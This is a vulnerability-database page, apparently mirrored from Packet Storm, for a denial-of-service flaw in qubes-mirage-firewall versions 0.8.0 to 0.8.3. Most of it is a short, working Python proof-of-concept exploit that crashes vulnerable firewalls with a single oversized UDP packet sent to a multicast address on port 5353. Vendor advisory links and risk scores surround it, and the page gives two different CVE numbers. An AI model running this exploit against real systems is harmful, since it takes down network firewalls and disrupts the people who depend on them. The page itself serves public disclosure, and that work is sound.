Lucene search
K

Qubes Mirage Firewall 0.8.3 Denial Of Service

🗓️ 31 Mar 2023 00:00:00Reported by Krzysztof BurghardtType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 239 Views

Qubes Mirage Firewall 0.8.3 Denial Of Service (DoS) CVE-2022-4677

Related
Code
`# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)  
# Date: 2022-12-04  
# Exploit Author: Krzysztof Burghardt <[email protected]>  
# Vendor Homepage: https://mirage.io/blog/MSA03  
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases  
# Version: >= 0.8.0 & < 0.8.4  
# Tested on: Qubes OS  
# CVE: CVE-2022-46770  
  
#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166  
  
#!/usr/bin/env python3  
  
from socket import socket, AF_INET, SOCK_DGRAM  
  
TARGET = "239.255.255.250"  
  
PORT = 5353  
  
PAYLOAD = b'a' * 607  
  
s = socket(AF_INET, SOCK_DGRAM)  
  
s.sendto(PAYLOAD, (TARGET, PORT))  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Mar 2023 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.5
EPSS0.16905
SSVC
239